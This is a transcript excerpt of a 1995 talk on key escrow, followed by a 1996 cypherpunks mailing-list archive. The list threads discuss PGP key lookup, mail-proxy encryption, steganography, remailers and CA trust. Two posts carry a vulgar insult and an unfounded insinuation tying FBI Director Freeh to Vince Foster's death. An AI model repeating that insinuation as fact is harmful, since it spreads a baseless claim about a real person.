It's clear to me that that is not going to happen. And the reason it
isn't is that the governments of the world aren't going to let it
happen.

So you might as well sort of accept that at some level the government
is going to be able to overhear or eavesdrop certain aspects of what
you do. But as I said, the financial aspects, pure financial
transactions, not general purpose electronic communications, but pure
financial transactions, they really don't care. That isn't what
they're trying to eavesdrop. They just want to be able to hear if
you're planning on doing some illegal activity.

And therefore this idea of key escrow comes up and that's what this
chart, this thing is about. Key escrow. For the government, you know
your private key, but also the government knows your private key.
(now, you can, and so) That's one way to do it. They can always know
your private key. You know, you've got a problem with your company
too. (but, you know) Most companies are trying to protect the
interests of the company and the shareholders, and that means that
companies, (I mean I know it, but) I'll bet every single one of your
companies has a mechanism to allow them to listen to your email or
your voicemail or look at some of that stuff at some point in history
because you might be doing something that compromises the interest of
that company, illegally.

So, even there, you need some mechanism to allow a corporation or the
government or someone to be able to get access when they absolutely
have to. That's the rub. When is, when do you absolutely need that
kind of access? We'd all like to think it's as rarely as possible, and
hopefully, never. But I think that these public key cryptosystems have
to accomodate that kind of need. They have to allow people in
governments to be able to access it.

(I, I mean) I just came back from Europe. And, you know, we're allowed
to export only the 40-bit version of our product into those countries.
Well, I can assure you that's not satisfactory from those (companies')
countries' point of view. Companies and the countries of Europe,
Germany, France, the UK, want to be able to have just as secure
communications as we can have inside our country. Because it's not to
do illicit things, it's to protect business secrets, so if they're
going to use the Internet for generalized communication they want to
be able to protect their generalized communication - against corporate
espionage. And that's a very, very valid requirement.

And so, I think we're taking the wrong solution if the way we're going
to protect information is just to make the keys easier to break, to
make the lock easier to break. We have to find a better way. That
means you need long keys, you need to have them be bulletproof, but
there needs to be some sort of access, and that's where the idea of
key escrow comes. But I think the key escrow idea is a little bit
wrong, because I think what you really need is the ability to... Think
of it this way; if I've got a lock, my key will open the lock. But I
may want to have another keyhole, where someone else's key will open
that lock as well. That other key might be the government's key. It
might be the key of my corporation if I'm doing corporate business.
(but) Or for example, you might have a health record, you know, a
medical record. You want to protect that. That's your private
information. But what happens when you're disabled, and there's an
emergency you need to get access to your health data, then there needs
to a be keyhole to allow people to open the lock in that case too.

So there's a kind of a diferent concept or a different mechanism -
multiple keys opening a lock, for example. There's one potential way,
and what we need is an electronic equivalent to that, I think these
things will come along very shortly.

You might also want to have unanimous, all keys have to be inserted
into the lock, kind of like the infamous red button that launches
missiles. The president and several other people have to have access
to it. This is the general concept, and I think that's what we're
going to have to have in a data security sense.

So, I have spent some time talking about the company Netscape, a
little bit about security in general...


Transcribed from:

DCI Email World and Internet Expo held in November 95 in Boston.
DC9523 session 100 - Security on the Net.

Tape is available from Conference Copy Inc.
http://www.confcopy.com/TAPES




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 1 Mar 1996 07:49:02 +0800
To: cme@cybercash.com (Carl Ellison)
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <v02140b16ad5baae32dfc@[204.254.34.231]>
Message-ID: <199602292001.PAA18761@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Carl Ellison writes:
> We weren't tying the distribution problem to the certificate problem.
> They really are separate.

I'm not entirely sure.

I think it would be valuable if signature formats specified not only
an arbitrary key-id but a DNSable string or URL to retrieve the
certificate responsible for the signature. One of the things we've
learned from PGP is the difficulty of dealing with random numbers as
key ids. In this, I'm not sure we shouldn't be including better lookup
mechanisms. This is not to say that meaning should be assigned to a
lookup string beyond its saying where to find the key.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 1 Mar 1996 09:43:40 +0800
To: cypherpunks@toad.com
Subject: Re: PGP to PC mail integration
Message-ID: <01I1SHIHFEBKAKTPB8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: lmccarth@cs.umass.edu

>Mike Ingle writes:
>> Instead of messing with user interfaces, you set the POP and SMTP
>> addresses of your mail program to "localhost". You run locally a Visual
>> Basic program that sits on ports 110 (POP) and 25 (SMTP) listening for
>> connections. The VB program is configured with the addresses of your
>> real SMTP and POP servers, and acts as a proxy.
> 
>> When your mail program retrieves POP mail, it goes through the VB
>> program, and the VB program decrypts any PGP mail it sees. When it
>> sends mail, the VB program encrypts any mail it has a PGP key for the
>> recipient of.

>Would you be stuck if you wanted to send something unsigned and/or 
>unencrypted ?

	You'd put something into the mail message itself that would tell it
"don't encrypt this" and/or "don't sign this". Hmm... you'd need to put in
messages to be signed and/or encrypted your passphrase, or have it gotten some
other way... which doesn't look very safe.
	Of course, if you're just encrypting it to the person's public key off
of your keyring, and for stuff that's coming in encrypted to someone else's
private key or signed with someone else's private key on your keyring, that
wouldn't be so much of a problem. For the stuff coming in with the
verification message (could be spoofed), looking for such strings already in
an incoming message would be good. An attacker could still potentially slip
something in between the mail program and the proxy program, though - the same
problem as with the passphrase in the message. 
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 4 Mar 1996 02:06:16 +0800
To: perry@piermont.com
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <199602292001.PAA18761@jekyll.piermont.com>
Message-ID: <199602292054.PAA17361@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I think it would be valuable if signature formats specified not only
> an arbitrary key-id but a DNSable string or URL to retrieve the
> certificate responsible for the signature. One of the things we've
> learned from PGP is the difficulty of dealing with random numbers as
> key ids. In this, I'm not sure we shouldn't be including better lookup
> mechanisms. This is not to say that meaning should be assigned to a
> lookup string beyond its saying where to find the key.

This is something that I've spoken to Phil about at length, and I've
been trying to devise solutions.  The problem is how to offset the
"hint" and the size of the signature.  You want the signature to
contain some informatin that hints at the location of the key.  On the
other hand, you dont want to bloat the signature in doing this.

So, there needs to be a compromise, some shorthand method to describe
the hint.  One solution is to provide a "keyserver" type and then some
string that says which "keyserver" to use.  For example, if there is a
DNS-style keyserver deplyed, I could put '1,"mit.edu"' in all my
signatures, if we assume that '1' is the DNS-style keyserver code.

I'm sure there are other possible solutions as well, and any real
suggestions are welcome.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@cybercash.com (Carl Ellison)
Date: Fri, 1 Mar 1996 09:13:40 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: A brief comparison of email encryption protocols
Message-ID: <v02140b24ad5bc8a12abb@[204.254.34.231]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 15:54 2/29/96, Derek Atkins wrote:

>So, there needs to be a compromise, some shorthand method to describe
>the hint.  One solution is to provide a "keyserver" type and then some
>string that says which "keyserver" to use.  For example, if there is a
>DNS-style keyserver deplyed, I could put '1,"mit.edu"' in all my
>signatures, if we assume that '1' is the DNS-style keyserver code.
>
>I'm sure there are other possible solutions as well, and any real
>suggestions are welcome.

is a URL just too big?  My sigs are already several lines long.  E.g.,

Key: ftp://ftp.clark.net/pub/cme/cme.asc

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTYY/1QXJENzYr45AQFr5QQAkff2u+VvCvpPYTyYCVsj1NFMD/dsN+Ps
Dyc7cX4iMDynls+dibG8cTAw6FrqKtvZ6qSDdu15oI49rHiEzTZOWj/VUKjlalmu
rp0QZ7iSiYinsHFK4H/ZfWarx/3RfngGFXjNOLQUjpe0Otqz1nnHqaVkCXPbz/VG
gmQbMKn5syA=
=hKEC
-----END PGP SIGNATURE-----

+--------------------------------------------------------------------------+
|Carl M. Ellison          cme@cybercash.com   http://www.clark.net/pub/cme |
|CyberCash, Inc., Suite 430                   http://www.cybercash.com/    |
|2100 Reston Parkway           PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
|Reston, VA 22091      Tel: (703) 620-4200                                 |
+--------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Zambini <jlasser@rwd.goucher.edu>
Date: Fri, 1 Mar 1996 10:53:50 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Simpler solutions (was Re: Stealth PGP work)
In-Reply-To: <199602290844.AAA03851@ix4.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.960229162811.6796B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 29 Feb 1996, Bill Stewart wrote:

> At 10:26 AM 2/28/96 -0500, Bruce Zambini wrote:
> >Or, you can develop a public-key stego system...
> >ie a stego system that uses bits in specific ways depending on the 
> >private key of the recipient.
> I assume you mean the public key of the recipient?

Well, no.  Or yes and no. Something like Public-Key crypto in general, 
where the public key isn't enough knowledge to decrypt it.  For example, 
you could encrypt a session key with RSA.

[...]
> You gain a certain degree of obscurity by using
>    stego(picture, scramble( PGP(message, pubkey), key ))
> where scramble is some cheap symmetric encryption algorithm and 
> key is either the recipient's public key or keyid, and PGP is in binary mode.
> This hides the message from eavesdroppers who don't know the recipient,
> but not from eavesdroppers who are willing to test against the keys
> of a list of usual suspects (assuming the recipient is one of them.)

Well, that's what I want to avoid; I think the issue is that as long as 
stego is predictable, there's a problem, ie a message to a certain party 
can be shown to exist, even if it's not readable. This might prove more 
than ample evidence in certain circumstances.

You shouldn't be able to recover the stego'd message without special 
knowledge.  This isn't addressed by current software, to my knowledge.

Jon Lasser
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 1 Mar 1996 09:41:48 +0800
To: cme@cybercash.com (Carl Ellison)
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <v02140b24ad5bc8a12abb@[204.254.34.231]>
Message-ID: <199602292139.QAA18366@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> is a URL just too big?  My sigs are already several lines long.  E.g.,
> 
> Key: ftp://ftp.clark.net/pub/cme/cme.asc

IMHO, yes.  Consider for a minute: there are currently about 20000 PGP
keys on the public keyservers.  There are about 30000 signatures on
those keys.  The keyrings are already 8MB or more.

Now, consider adding a URL to every signature.  Lets even use your
URL, which is 35 characters long (and lets not even count the NULL or
length byte).  Adding this URL to 30000 signatures would add 1050000
bytes, or just over 1MB.  This is an increase in 12% of the keyrings!

On the other hand, using my method and your "URL" (clark.net) would
add only 10 bytes per sig, or 300k.  This is only a 4% increase.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 1 Mar 1996 11:45:05 +0800
To: "Michael A. Atzet" <atzet@vnet.ibm.com>
Subject: Re: X.509 certs that don't guarantee identity
In-Reply-To: <199602260448.WAA01201@proust.suba.com>
Message-ID: <31365328.7DEE@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael A. Atzet wrote:
> How will Navigator differentiate between the different level certs? I am not
> aware of any fields in the cert itself that designate what level it is.
> I know that the subject info would "look" different for a persons name vs.
> email address vs commom name.

  The navigator will not differentiate them.  We build in a default set of
CA certificates into the navigator, and then allow the user to modify them as
they see fit based on their local trust policy.  The default set of CAs that
we ship with our product will not include the verisign level 1&2 CAs as trusted
SSL Server CAs.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimb@alpha.c2.org (Jim Browne)
Date: Fri, 1 Mar 1996 14:12:04 +0800
To: cypherpunks@toad.com
Subject: Re: "Louis Freeh is a Cocksucker"
Message-ID: <199603010154.RAA03237@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz says:

> OVer on alt.something.somesomething-or-other.whitewater, there > are people keeping track of dates and events. It has been
> noticed that Freeh was sworn in _just before_ Vincent Foster's 
> body was found.

That's certainly very suspicious!

I bet that Freeh *is* Vince Foster with plastic surgery!
-- 
JimB
"I feel good!"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 1 Mar 1996 04:07:26 +0800
To: cypherpunks@toad.com
Subject: Top Spy Hawks GAK
Message-ID: <199602291708.SAA10852@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Admiral William O. Studeman Accepts Position on Premenos
Board of Directors

Concord, Calif., 28 Feb 1996 -- Premenos Technology
Corp., a leading provider of electronic data interchange
(EDI) software solutions for electronic commerce
applications, today announced the election of Admiral
William O. Studeman, U.S. Navy-retired, to its Board of
Directors effective immediately. Studeman will also act
as consultant on special projects including security and
encryption issues.

Admiral Studeman, age 56, is the former Deputy Director
of Central Intelligence and served for five months in
1995 as the acting Director of Central Intelligence. He
retired from the Navy in October 1995. Prior to his
assignment at the Central Intelligence Agency (CIA),
Studeman was the Director of the National Security Agency
(NSA), and before that was the Director of Naval
Intelligence.

In these positions, Studeman was involved in attempting
to develop public policies and technologies that
addressed the complex and often conflicting issues of
enhanced economic competitiveness, law enforcement's
warranted requirement for information transparency in
pursuit of criminal investigations, national security
interest in combating potential information warfare
threats, and the country's overall increased need for
enhanced protection of its information-related systems
and applications.

In commenting on his election to the Board of Premenos,
Studeman stated that "Premenos is not only a leader in
facilitating the promising future of electronic commerce,
it is the first company in the marketplace with a product
line for enhanced protection, security and integrity for
the Internet and other electronic communications-related
business transactions."

Studeman added, "In working with Lew Jenkins and others
in the company, I have an opportunity to better frame the
government-industry dialogue and define the
infrastructure, standards, regulatory, technical and
other directional factors which must be addressed for
electronic commerce -- a rapidly evolving industry
segment so fundamental to the future of the American
lifestyle and national security."

Lew Jenkins, chairman and founder of Premenos said, "The
infrastructure for moving critical business data over the
Internet is crucial to the success of electronic
commerce. We welcome Admiral Studeman to our team and
look forward to his help in developing a trusted model
for the electronic commerce market and establishing a
solid infrastructure similar to the stringent military
requirements that have been in place for decades."

About Premenos Corp.

Premenos is setting the agenda for electronic commerce
and EDI through open networks such as the Internet. 
Premenos EDI software is an enabling strategy for
transforming how corporations conduct business in
extended enterprises using electronic communications.

Templar -- a suite of software and services that enable
businesses to send and receive EDI documents securely and
reliably over the Internet -- was awarded the EMA '95
Electronic Commerce Product Excellence Award recognizing
the most innovative new product debuted at EMA's annual
conference.

Premenos products support the IBM AS/400, RISC
System/6000, HP 9000, SunSparc, Windows 3.x, NT and
Windows 95. Premenos has a worldwide presence with sales
offices in California, London and Paris.

Contact Premenos World Wide Web (WWW) home page at
http://www.premenos.com to access over 3000 pages of
information on electronic commerce, EDI, standards, as
well as Premenos corporate information materials.

--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: johan@eniac.campus.luth.se (Johan Sandberg)
Date: Fri, 1 Mar 1996 05:32:28 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Cypherpunk remailer
In-Reply-To: <199602290844.AAA03847@ix4.ix.netcom.com>
Message-ID: <717.6633T1090T304@eniac.campus.luth.se>
MIME-Version: 1.0
Content-Type: text/plain



In a reply to Johan Sandberg <johan@eniac.campus.luth.se>
on 29-Feb-96 13:44:24, Bill Stewart <stewarts@ix.netcom.com>
writes about "Re:Cypherpunk remailer"

>> At 01:06 PM 2/28/96 +0100, you wrote:
>>How do I send Email through a cypherpunk remailer?
>>
>>I know that I encrypt with PGP, but where should I write to who the email is
>>for???

>For most remailers, if you send it mail with
>        Subject: help
>or      Subject: remailer-help
>(depending on remailer version) it will send you help.
>(pamphlet@idiom.com is down right now, unfortunately.)

Thanks..

>The mixmaster remailers require special client software on your machine.

What special software? What will the client do?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Fri, 1 Mar 1996 14:20:26 +0800
To: perry@piermont.com
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <199602292135.QAA18937@jekyll.piermont.com>
Message-ID: <199603010154.TAA05515@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> In the end, we are probably going to need something in the way of key
> servers, which may (or may not) imply either a new type of URL or
> something other than a URL to do retrieval off of.

Sorry for the stupid questions, but I want to make sure I'm on the same 
page as the rest of you.  Correct me where I'm wrong --

The idea to have a distributed database (like DNS?) that allows you to
retrieve keys with query strings similar to urls.  So if you wanted to do
a secure telnet to host.foobar.com, you'd submit something like
"telnet://host.foobar.com" to the key server, and it would give you back a
key.  If you wanted to send mail to me, you'd submit something like 
"mailto://alex@suba.com".  Etc.

The key distribution system wouldn't address the problem of trust
directly, but the key you'd get back from the server would contain
information that you could use to verify it.  Suppose I get signed email 
from Perry.  The signature would contain something like 
"mailto://perrry@piermont.com" -- I could use that to get Perry's key to 
verify the signature.  Along with Perry's key I'd probably get a 
signature from some entity that vouches for his key, maybe a piermont.com 
key.  I could follow the chain up until I hit an entity I trust.


If this is correct, I have a question:

What's the advantage of using this url type system instead of "fully
qualified" certificates, ie., attaching all the keys and signatures to the
object?  Doesn't the give and take with the key servers more than wipe out
the advantage of the smaller data object?

Does the win come from solving the revocation problem?


Finally, does anyone know if anything's been happening with Matt's key
management project? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Fri, 1 Mar 1996 12:23:46 +0800
To: cypherpunks@toad.com
Subject: RE: Possible Java hack
Message-ID: <0099EA68.385ABF20.1@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


Some of you may remember an assertion that I made (and posted here) about a
month ago under the the thread "Possible Java hack".  The latest publicized 
Princeton hack is exactly the same thing that I eventually came up with, and 
I've consolidated my findings at <URL: http://www.aztech.net/~steve/java/>

(Crypto and Firewalls relevance will become aparent, once you take a look.)

FYI,

--
Steve@AZTech.Net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 1 Mar 1996 11:34:37 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: "Louis Freeh is a Cocksucker"
In-Reply-To: <199602290201.SAA01927@jobe.shell.portal.com>
Message-ID: <Pine.SV4.3.91.960229200331.24313B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


OVer on alt.something.somesomething-or-other.whitewater, there are people 
keeping track of dates and events. It has been noticed that Freeh was 
sworn in _just before_ Vincent Foster's body was found.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@santafe.edu>
Date: Sat, 2 Mar 1996 14:25:01 +0800
To: cypherpunks@toad.com
Subject: Re: Chaff in the Channel (Stealth PGP work)
In-Reply-To: <ad5b906f080210042e09@[205.199.118.202]>
Message-ID: <199603010418.VAA02087@nelson.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


Is anyone here on the Steganography mailing list? Last I checked it
looked pretty dead, which is a shame. Stego seems to be a really
important topic, and a difficult one at that. The good news is there's
all sorts of entropy in the data we send back and forth, the bad news
is it's hard to actually exploit it.

tcmay@got.net (Timothy C. May) writes:
>This is my take on fixing the stego situation. Instead of worrying about a
>"stealth PGP version," which is likely to be only a slight speed bump
>(because of the statistics), think about flooding the detection channels.

The stealth PGP is, of course, a necessary element: you have to remove
the big "THIS IS AN ENCRYPTED MESSAGE FOR RESISTOR-CELL-23" before you
can slip it in somewhere.

As noble as "flood the detection channels" sounds, has it really ever
succeeded? Do people who don't care about privacy day to day ever go
through extra trouble to make other people's privacy easier? I can
think of two public efforts to increase noise that have failed:
putting Spook keywords in all Usenet posts, and using PGP email for
normal day to day traffic. The failure of the second channel-flooding
is especially notable: even people doing serious crypto hacking, with
well established public keys, don't seem to PGP encrypt normal day to
day traffic. It's just not convenient enough.

I think asking people to increase entropy in their day to day
communication is doomed to fail, it's just too much trouble. Better to
exploit the entropy we already have, and maybe encourage designers of
new systems to build in some extra entropy sources when they get the chance. 

I've got some specific ideas, but am a bit nervous about talking about
them because of intellectual property issues. Also, I'm not convinced
that unlike cryptography, some extra security can be maintained in a
steganographic system by not disclosing the way it works. I haven't
resolved these concerns, but would be happy to engage in some
metadiscussion about them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sat, 2 Mar 1996 09:20:25 +0800
To: John Pettitt <cypherpunks@toad.com
Subject: Re: SET spec available
Message-ID: <ad5bf2e804021004ce92@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 12:09 AM 2/24/96, John Pettitt wrote:
>The SET transaction spec is now available on www.visa.com (and presumably on
>www.mastercard.com although I didn't check).
....
I am unable to find the specs. Anyone have an URL?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Sat, 2 Mar 1996 18:33:52 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Percy the Python loves IPG
Message-ID: <199603010545.VAA26039@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:44 AM 2/29/96 -0800, you wrote:
>At 10:41 PM 2/25/96 -0500, ab411@detroit.freenet.org (David R. Conrad) wrote:
>>I think the IPG system is great!  Percy, my pet python, has never been
>>slicker or better lubricated!
>:-)
>
>>IPG Sales <ipgsales@cyberstation.net> wrote:
>>>Perhaps so, but our system does employ a true hardware generated OTP, and
>>>operates similiar to what you describe -  however, the important
>>>differernce is that we use a small OTP to generate a larger OTP, like
>>>stringing the cable across the Golden Gate narrows.
>
..removed..
>So please email me the keys to your company; I'll donate 10% of the value
>to David's python Percy for extra snake oil.

Send me some money to me too, and I'll send you back 10,000 disks with
Certified Random Data on them.  Getcher One Time Pads here, folks!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomservo@access.digex.net (Scott Fabbri)
Date: Fri, 1 Mar 1996 14:18:53 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: PGP to PC mail integration
Message-ID: <v02130502ad5c12f44e5c@[206.161.72.78]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

An entity known as "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
writes:

>        You'd put something into the mail message itself that would tell
it
>"don't encrypt this" and/or "don't sign this". Hmm... you'd need to put
in
>messages to be signed and/or encrypted your passphrase, or have it gotten
some
>other way... which doesn't look very safe.

exmh on Unix systems goes the other way. It adds a header line that
includes the sender and recipient, plus the action to be performed
("encrypt," "sign" or "encryptsign"). No header, no encryption/signature.
I'm reasonably sure it strips off that line before it passes the message
off to sendmail -- but I usually don't send messages to myself that way. :-
)

For incoming mail, it looks for standard PGP structure and figures out what
it needs from the user. If, for instance, you don't have a public key on
your keyring, it allows you to send a mail message to a server to grab it -
- - otherwise it performs the operation and shows you the results.

If what you're doing requires a password (signing or decrypting), it pops
up a window to ask you for it. When it's done, it prompts you to press
Return and disappears.

It was written in tcl/Tk, but some of it may be applicable for what you
want to do. (Sorry, I'm not an expert on either.)

Scott

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMTZk4evEnOI8TfM9AQGiKwL6A+XCKH68tfqJNE6cDRR7KClbXuSchBF3
UW6lY5ZzQIkZSTEKLm6EK2uEg6h9wafO38Dzm61PAdLZ0te67Kqtb4V4seTW4k4M
+YBLuUAiutVgZayj2OdrWjvlc43M495w
=GrDt
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Fri, 1 Mar 1996 09:12:52 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PGP to PC mail integration
Message-ID: <2.2.32.19960229210046.0033fb94@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 12:27 1996-02-29 -0500, you wrote:
>Please don't send me extra copies of mail sent to cypherpunks.

Ok, we'll skip the list. They probably don't care about this nit picking.

>Go back and read what Mike Ingle wrote
(http://www.hks.net/cpunks/cpunks-24/1540.html)

I did read it the first time around. Very carefully, since I was already
debugging the program he was talking about. He wrote " the VB program
decrypts any PGP mail it sees," and I believe that decryption requires a
user interface for the pass phrase.

But I think that Mike can speak for himself on the list. Let's end this
discussion about what he meant.  We obviously interpreted his idea differently.

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <inglem@adnetsol.com>
Date: Sat, 2 Mar 1996 09:22:54 +0800
To: cypherpunks@toad.com
Subject: Re: PGP to PC mail integration
Message-ID: <199603010652.WAA00782@cryptical.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


>Seriously, the idea here is that the pgp front end shouldn't deal with
>the user interface in your present mail program. Nobody (before you)
>have considered doing it completely without a user interface.

Exactly. Yes, it will at least have to have a config screen. It will
probably have to prompt for a passphrase on the fly, unless you want to
store it. It can ask to encrypt or not, or it can have a header in the
message. The important thing is I don't care about the user interface
of the mail program. This has been the big barrier so far.

						Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 2 Mar 1996 14:28:08 +0800
To: perry@piermont.com
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <199602292135.QAA18937@jekyll.piermont.com>
Message-ID: <199603010356.WAA10509@homeport.org>
MIME-Version: 1.0
Content-Type: text


In suggesting key:// urls, I (without commenting) placed a path of
/s/telnetd/ in a URL.  I was considering that a telnetd might need
many keys and associated documents, all of which could be found in a
directory.

	gateway's master telnetd public key.
	daily keys
	policy statements about who may connect, or how
	etc

I expect that we could extend the syntax in such a way that a URL
could contain most of the data we need.  Thus, the default document
might be a 'cert of the day,' with possibly with references within the
certificate to the master telnetd key, the hosts master key.

	To expand, I was thinking of:

	key://foo.bar.com/{u,s,h,d}/family/instance

	The first two bits, the scheme (key) and host are pretty
clear.  They're followed by an (arbitrary) grouping, of User, System,
Host or Domain.

	User is for user space certificates, such as personal
certs, or possibly currently in use IPv6 keys.  System is for system
daemons, such as telnetd.  Host is for host certificates, such as
might be generated for a host to sign its daemon's keys.  Domain could
be analogous to host, but for an entire domain.

	Family is for natural groupings, such as telnetd or adam, or
within a domain, certificates by host.  An thus a host's certificates
would be available under h/main/cert.asc or d/mailhost/cert.asc.  It
would be possible to extend this by date, to
d/mailhost/96/march/cert.asc

	Instance would then be the particular certificate, in a
standardized namespace.

	These are no longer particularly short in the verbose version,
but they are capable of being optimized (by ommission) for the usual
cases.

Adam


Perry E. Metzger wrote:

| Carl Ellison writes:
| > Key: ftp://ftp.clark.net/pub/cme/cme.asc
| 
| URLs are nice, but I'm not quite sure they are sufficient in practice,
| though they are certainly theoretically sufficient. If I get a
| document from someone, and it is signed, I'd like to be able to get
| the key associated with the signature, and the URL is in theory enough
| to do that. However, going in the opposite direction -- retrieving a
| key associated with, say, a remote host's TELNET server, I'd like to
| be able to query a server ask much more flexible questions than an FTP
| URL would let me ask -- I might have a prefered public key system (RSA
| versus DSS or what have you), I might want to be able to distinguish
| between versions of the key, I might want to ask for all keys of a
| certain class, etc.
| 
| In the end, we are probably going to need something in the way of key
| servers, which may (or may not) imply either a new type of URL or
| something other than a URL to do retrieval off of.
| 
| Perry
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 Mar 1996 06:02:48 +0800
To: cypherpunks@toad.com
Subject: Re: PGP backdoor?  (No, I'm not paranoid.)
Message-ID: <199603010717.XAA00785@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


No, you're not being paranoid, you're just believing someone who is,
or else they're having a good time at your expense ....

At 01:22 PM 2/28/96 -0800, Mark Bainter <Mark@adspp.com> wrote:
> Now, I had heard about all the people who claimed the reason versions 
> later than 2.3 wouldn't work with 2.3 was because of a backdoor for the
government.
> I personally thought they were being paranoid. 

You acquaintance, aside from his level of chemical enhancement (:-),
doesn't have the facts straight.  The 2.6-vs-2.3 incompatibility is
to keep RSA's patent lawyers happy; 2.5 and later versions use RSAREF
instead of Phil's homegrown RSA implementation, and the incompatibility
lets them maintain the fiction that they're protecting their patent.

The _technical_ reason they're incompatible is that the version number
in the headers is different, and PGP has the good design sense not to
mess with files that have a version number newer than the one they
know how to read.  Nothing more.  The RSA implementation code is different,
but you can look at it and see that it's functionally equivalent,
and read all the nice legalese comments about how this stuff belongs to RSA
and/or PKP
and is patented in the US and other fine countries and not to be exported.
Its primary difference is that it's a bit slower :-)

> However, this guy tells me that he met Phil at defcon and phil told him
> that he co-operated with the government and gave them information 
> that would enable them to crack key's for versions later than 2.3.  

He may very well have met a guy called "Phil" at defcon who said that......

The one Phil that I know who's told the NSA how to break his crypto code
was Phil Karn from Qualcomm, who had to explain to the NSA how to crack
the too-short encryption they were being forced to use in their digital
cellphones
in return for being allowed to use that instead of yet-wimpier encryption.
Phil knows crypto and security, and has commented on the stupidity and 
offensiveness of the whole process.  He's also the guy suing the Feds
to get export permission for the Applied Cryptography (compatible) 
source code disks, after getting export permission for the paper version.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 3 Mar 1996 06:03:11 +0800
